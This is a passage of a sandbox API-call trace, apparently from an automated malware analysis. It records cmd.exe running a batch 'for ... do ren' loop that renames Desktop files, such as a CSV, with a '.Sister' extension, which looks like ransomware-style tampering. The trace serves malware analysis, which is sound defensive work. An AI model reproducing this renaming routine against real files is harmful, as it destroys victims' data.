_get_osfhandle (_FileHandle=1) returned 0x50 [0198.067] GetFileType (hFile=0x50) returned 0x2 [0198.068] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.068] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0198.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.075] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0198.205] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.205] GetFileType (hFile=0x50) returned 0x2 [0198.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.205] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0198.241] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.241] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9a25060*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9a25060*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0198.319] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0198.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.319] GetFileType (hFile=0x50) returned 0x2 [0198.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.320] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0198.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.362] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0198.411] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0198.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.411] GetFileType (hFile=0x50) returned 0x2 [0198.412] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.412] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0198.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.425] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0198.460] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0198.531] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0198.532] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0198.533] malloc (_Size=0xffce) returned 0x21ed971fd40 [0198.533] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0198.533] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0198.533] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0198.533] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0198.533] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0198.533] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0198.533] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0198.534] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0198.534] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0198.534] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0198.534] ??_V@YAXPEAX@Z () returned 0x1 [0198.534] GetProcessHeap () returned 0x21ed8c70000 [0198.534] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6c9a0 [0198.534] GetProcessHeap () returned 0x21ed8c70000 [0198.534] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c9a0, Size=0x130) returned 0x21ed8d6c9a0 [0198.534] GetProcessHeap () returned 0x21ed8c70000 [0198.534] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c9a0) returned 0x130 [0198.534] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.534] malloc (_Size=0xffce) returned 0x21ed971fd40 [0198.534] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0198.534] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0198.535] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed971fd40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0198.536] ??_V@YAXPEAX@Z () returned 0x1 [0198.536] GetProcessHeap () returned 0x21ed8c70000 [0198.536] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6b2f0 [0198.536] GetProcessHeap () returned 0x21ed8c70000 [0198.536] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d570 [0198.537] GetProcessHeap () returned 0x21ed8c70000 [0198.537] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d570, Size=0x130) returned 0x21ed8d6d570 [0198.537] GetProcessHeap () returned 0x21ed8c70000 [0198.537] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d570) returned 0x130 [0198.537] malloc (_Size=0xffce) returned 0x21ed971fd40 [0198.537] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0198.537] GetProcessHeap () returned 0x21ed8c70000 [0198.537] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a147c0 [0198.537] GetProcessHeap () returned 0x21ed8c70000 [0198.537] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed95594c0 [0198.537] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0198.537] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0198.537] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0198.537] GetLastError () returned 0x2 [0198.537] GetProcessHeap () returned 0x21ed8c70000 [0198.537] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a25530 [0198.537] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a25540 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0198.538] SetErrorMode (uMode=0x0) returned 0x0 [0198.538] SetErrorMode (uMode=0x1) returned 0x0 [0198.538] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed971fd40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0198.538] SetErrorMode (uMode=0x0) returned 0x1 [0198.538] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0198.538] GetProcessHeap () returned 0x21ed8c70000 [0198.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955a360 [0198.538] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0198.538] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0198.538] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0198.538] GetLastError () returned 0x2 [0198.539] ??_V@YAXPEAX@Z () returned 0x1 [0198.539] malloc (_Size=0xffce) returned 0x21ed971fd40 [0198.539] ??_V@YAXPEAX@Z () returned 0x21ed971fd40 [0198.539] malloc (_Size=0xffce) returned 0x21ed972fd20 [0198.539] ??_V@YAXPEAX@Z () returned 0x21ed972fd20 [0198.539] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0198.539] GetLastError () returned 0x2 [0198.539] _get_osfhandle (_FileHandle=2) returned 0x54 [0198.539] GetFileType (hFile=0x54) returned 0x2 [0198.539] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0198.540] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0198.596] _get_osfhandle (_FileHandle=2) returned 0x54 [0198.596] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0198.675] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0198.675] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0198.675] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0198.726] longjmp () [0198.726] ??_V@YAXPEAX@Z () returned 0x1 [0198.726] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="yLW8a6BSku30pNN.csv", cAlternateFileName="")) returned 1 [0198.726] GetProcessHeap () returned 0x21ed8c70000 [0198.726] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d070, Size=0x514) returned 0x21ed8d6d6b0 [0198.726] GetProcessHeap () returned 0x21ed8c70000 [0198.726] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d6b0) returned 0x514 [0198.726] GetProcessHeap () returned 0x21ed8c70000 [0198.726] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9573240 [0198.727] GetProcessHeap () returned 0x21ed8c70000 [0198.727] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9573240, Size=0x30) returned 0x21ed9573240 [0198.727] GetProcessHeap () returned 0x21ed8c70000 [0198.727] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9573240) returned 0x30 [0198.727] GetProcessHeap () returned 0x21ed8c70000 [0198.727] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9573280 [0198.727] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed937b1b0 [0198.729] ??_V@YAXPEAX@Z () returned 0x1 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9573280, Size=0x1b0) returned 0x21ed9573280 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9573280) returned 0x1b0 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9573440 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9573440, Size=0x290) returned 0x21ed9573440 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9573440) returned 0x290 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95736e0 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95736e0, Size=0x30) returned 0x21ed95736e0 [0198.729] GetProcessHeap () returned 0x21ed8c70000 [0198.729] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95736e0) returned 0x30 [0198.730] GetProcessHeap () returned 0x21ed8c70000 [0198.730] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9573720 [0198.730] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0198.730] GetProcessHeap () returned 0x21ed8c70000 [0198.730] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed937a9b0 [0198.730] ??_V@YAXPEAX@Z () returned 0x1 [0198.730] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0198.730] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14160 [0198.730] FindClose (in: hFindFile=0x21ed9a14160 | out: hFindFile=0x21ed9a14160) returned 1 [0198.730] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14160 [0198.731] FindClose (in: hFindFile=0x21ed9a14160 | out: hFindFile=0x21ed9a14160) returned 1 [0198.731] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa0a0ddec, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa0a0ddec, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14dc0 [0198.731] FindClose (in: hFindFile=0x21ed9a14dc0 | out: hFindFile=0x21ed9a14dc0) returned 1 [0198.731] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yLW8a6BSku30pNN.csv", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbff840b0, ftCreationTime.dwHighDateTime=0x1d5ef44, ftLastAccessTime.dwLowDateTime=0x7ae7f5f0, ftLastAccessTime.dwHighDateTime=0x1d5e0cc, ftLastWriteTime.dwLowDateTime=0x7ae7f5f0, ftLastWriteTime.dwHighDateTime=0x1d5e0cc, nFileSizeHigh=0x0, nFileSizeLow=0xcb3b, dwReserved0=0x4, dwReserved1=0x80, cFileName="yLW8a6BSku30pNN.csv", cAlternateFileName="YLW8A6~1.CSV")) returned 0x21ed9a14e20 [0198.731] FindClose (in: hFindFile=0x21ed9a14e20 | out: hFindFile=0x21ed9a14e20) returned 1 [0198.731] _wcsnicmp (_String1="YLW8A6~1.CSV", _String2="yLW8a6BSku30pNN.csv", _MaxCount=0x13) returned 28 [0198.731] malloc (_Size=0x1ff9c) returned 0x21ed973fd00 [0198.732] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0198.733] GetProcessHeap () returned 0x21ed8c70000 [0198.733] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed937abb0 [0198.734] ??_V@YAXPEAX@Z () returned 0x1 [0198.734] ??_V@YAXPEAX@Z () returned 0x1 [0198.734] GetProcessHeap () returned 0x21ed8c70000 [0198.734] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9573720, Size=0x1b0) returned 0x21ed9573720 [0198.734] GetProcessHeap () returned 0x21ed8c70000 [0198.734] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9573720) returned 0x1b0 [0198.734] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0198.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.734] GetFileType (hFile=0x50) returned 0x2 [0198.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.734] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0198.765] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.765] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0198.778] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0198.779] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0198.779] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0198.779] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.779] GetFileType (hFile=0x50) returned 0x2 [0198.779] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.779] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0198.781] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.781] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0198.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.807] GetFileType (hFile=0x50) returned 0x2 [0198.807] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.807] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0198.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.837] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9573250*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9573250*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0198.842] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"yLW8a6BSku30pNN.csv\" \"yLW8a6BSku30pNN.csv.Sister\" ") returned 52 [0198.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.842] GetFileType (hFile=0x50) returned 0x2 [0198.842] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.842] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0198.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.857] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x34) returned 1 [0198.902] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0198.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.902] GetFileType (hFile=0x50) returned 0x2 [0198.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0198.902] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0198.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0198.959] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0199.066] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0199.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.066] GetFileType (hFile=0x50) returned 0x2 [0199.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0199.066] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0199.362] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.362] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0199.473] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0199.473] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.473] GetFileType (hFile=0x50) returned 0x2 [0199.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0199.473] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0199.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.570] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0199.659] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0199.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.659] GetFileType (hFile=0x50) returned 0x2 [0199.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0199.659] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0199.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.794] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0199.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0199.916] GetFileType (hFile=0x50) returned 0x2 [0199.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0199.916] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0200.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.068] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed95736f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed95736f0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0200.289] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"yLW8a6BSku30pNN.csv.Sister\" \"yLW8a6BSku30pNN.bat\" ") returned 52 [0200.289] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.289] GetFileType (hFile=0x50) returned 0x2 [0200.289] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0200.289] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0200.446] _get_osfhandle (_FileHandle=1) returned 0x50 [0200.446] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, 